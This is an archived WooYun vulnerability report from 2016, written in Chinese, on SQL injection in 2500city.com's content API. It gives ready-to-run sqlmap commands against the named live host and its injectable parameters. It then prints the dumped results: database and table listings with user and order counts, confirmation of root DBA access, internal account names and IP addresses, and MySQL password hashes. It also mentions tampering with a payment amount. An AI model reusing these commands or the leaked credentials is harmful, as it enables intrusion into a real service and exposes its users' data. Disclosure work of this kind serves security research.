乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-05-13: 细节已通知厂商并且等待厂商处理中 2016-05-18: 厂商已经主动忽略漏洞,细节向公众公开
RT
sqlmap语法:sqlmap.py -u "http://content.2500city.com/Json?relatedOrder=7&platform=2&deviceId=864690023834800&method=SaveComent&appVersion=3.9.2&userId=1678074&version=3.9.2&comment=%F0%9F%98%811&type=1&uname=rknsja&relateId=470258" -p "relatedOrder" --dbs---------------------------------------------------------------------------------sqlmap语法:sqlmap.py -u "http://content.2500city.com/Json?platform=2&deviceId=864690023834800&method=SaveComent&appVersion=3.9.2&userId=1678074&version=3.9.2&comment=111&type=1&uname=rknsja&relateId=470214" -p "relateId" --dbs
数据库信息
available databases [21]:[*] bike[*] information_schema[*] mysql[*] news_stat[*] palau_core[*] statistic[*] sztv[*] sztv_baoliaodb[*] sztv_busdb[*] sztv_coachdb[*] sztv_mcenterdb[*] sztv_newsdb[*] sztv_paydb[*] sztv_statdb[*] sztv_subwaydb[*] sztv_systemdb[*] sztv_taxidb[*] sztv_ucenterdb[*] sztv_urecorddb[*] sztv_weatherdb[*] sztv_webdb
dba权限垮裤查询83w用户信息+57w订单Database: sztv_ucenterdb+--------------------+---------+| Table | Entries |+--------------------+---------+| `user` | 830469 || order_info | 574954 || credit_log | 395133 || user_currency | 364474 || currency_log | 364351 || credit | 257099 || login_log | 197593 || sms_user | 46552 || account_log | 19755 || user_account | 19700 || mobile | 6849 || smsverify_log | 2463 || refundorder | 927 || invitelog | 584 || event_2016050401_1 | 223 || blacklist | 176 || credit_rule | 7 || product_notice | 7 || user_addr | 2 || smsverify | 1 |+--------------------+---------+
Database: sztv_paydb+---------------+---------+| Table | Entries |+---------------+---------+| action_order | 29872 || action_draw | 1901 || action_draw_1 | 1457 || `action` | 14 |+---------------+---------+Database: palau_core+---------------+---------+| Table | Entries |+---------------+---------+| user_passport | 788284 || user_profile | 787466 || user_secret | 787465 || application | 6 || client | 2 || client_app | 2 |+---------------+---------+Database: sztv_coachdb+--------------------+---------+| Table | Entries |+--------------------+---------+| `order` | 434727 || `user` | 138878 || email | 6674 || stat_email_deliver | 2661 || t | 21 |+--------------------+---------+Database: bike+---------------------+---------+| Table | Entries |+---------------------+---------+| pm25 | 53629405 || bike_statistics | 11931902 || vote_record | 2266953 || booklog | 275523 || car_price | 82911 || linestationinfo | 28996 || survey_addedoption | 20785 || busstationinfo | 20199 || bike_badwords | 20142 || bike_busstation | 19743 || survey_action | 19478 || survey_answers | 16275 || busstation | 8371 || xunbao_user | 3788 || bike_station_copy | 2552 || ct_log | 2389 || skin_icon | 1232 || bike_station | 1163 || linestation | 905 || vote_info | 789 || survey_option | 621 || bike_splashimg | 597 || bookiphone | 308 || gravity | 205 || survey_title | 162 || bike_linestation | 129 || ct_option | 128 || bike_trainstation | 125 || temp_apply | 115 || bike_mood | 102 || vote_candidate | 102 || skin_background | 80 || xunbao_temp | 51 || ct_page | 47 || ct_title | 46 || temp_apply1 | 46 || bookandroid | 40 || survey_page | 30 || survey_candidate | 24 || vote_information | 20 || temp_apply2 | 18 || book | 15 || bike_city | 13 || apps_recommend_copy | 12 || temp_dhsz12 | 12 || bike_stationnews | 11 || apps_recommend | 10 || survey_voteinfo | 9 || taxi_landmark | 9 || bookImg | 8 || bike_line | 4 || skin_program | 4 || survey_vote | 4 || survey_awardtimes | 3 || sztv_ad | 2 || bike_admin | 1 |+---------------------+---------+
[02:37:40] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.3.29back-end DBMS: MySQL 5.0[02:37:40] [INFO] testing if current user is DBA[02:37:40] [INFO] fetching current user[02:37:40] [INFO] resumed: root@%current user is DBA: True[02:37:40] [INFO] fetching database users[02:37:40] [INFO] the SQL query used returns 282 entdatabase management system users [22]:[*] 'backup'@'192.168.50.50'[*] 'bakdb'@'%'[*] 'bakdb'@'192.168.50.89'[*] 'bakup'@'192.168.50.89'[*] 'chaxun'@'%'[*] 'cloud'@'%'[*] 'dbbak'@'192.168.50.89'[*] 'dbbak'@'localhost'[*] 'debian-sys-maint'@'localhost'[*] 'jeecn'@'localhost'[*] 'jiankongbao'@'60.195.252.106'[*] 'jiankongbao'@'60.195.252.107'[*] 'reader'@'%'[*] 'root'@'%'[*] 'root'@'127.0.0.1'[*] 'root'@'192.168.50.177'[*] 'root'@'192.168.50.20'[*] 'root'@'192.168.50.40'[*] 'root'@'192.168.50.60'[*] 'root'@'192.168.50.74'[*] 'root'@'localhost'[*] 'txq'@'%'eb application technology: PHP 5.3.29back-end DBMS: MySQL 5.0database management system users password hashes:[*] backup [1]: password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC[*] bakdb [2]: password hash: *358FCE96A37CA6A8DDBAE3EBA3A61385F709C060 password hash: *939C0EE8C109E2F942E2AE69B29016556BAF6819[*] bakup [1]: password hash: *A116AE5F665BF5F27292C069082E763E023D597B[*] chaxun [1]: password hash: *358FCE96A37CA6A8DDBAE3EBA3A61385F709C060[*] cloud [1]: password hash: *358FCE96A37CA6A8DDBAE3EBA3A61385F709C060[*] dbbak [2]: password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC password hash: *F42C6D37F7F070D029EDED0C444C833B66147779[*] debian-sys-maint [1]: password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC[*] jeecn [1]: password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC[*] jiankongbao [2]: password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC password hash: *FC69E042CE30D92E2952335F690CF2345C812E36[*] reader [1]: password hash: *ADAFC02D5BD8CD1DC3BD2D4EC546BE906B907471[*] root [3]: password hash: *09B8E1925D91B246C24321C967D2181F8CF86D82 password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC password hash: *3ACC54E8541A9AE6E1381A5320E5244D3C01F474[*] txq [1]: password hash: *2885FF2B3FEB66C3AF1F0411561567CBAC7A92DC
这里一个支付的不知道是不是
抓包
修改为0.1
过滤
危害等级:无影响厂商忽略
忽略时间:2016-05-18 12:20
漏洞Rank:15 (WooYun评价)
暂无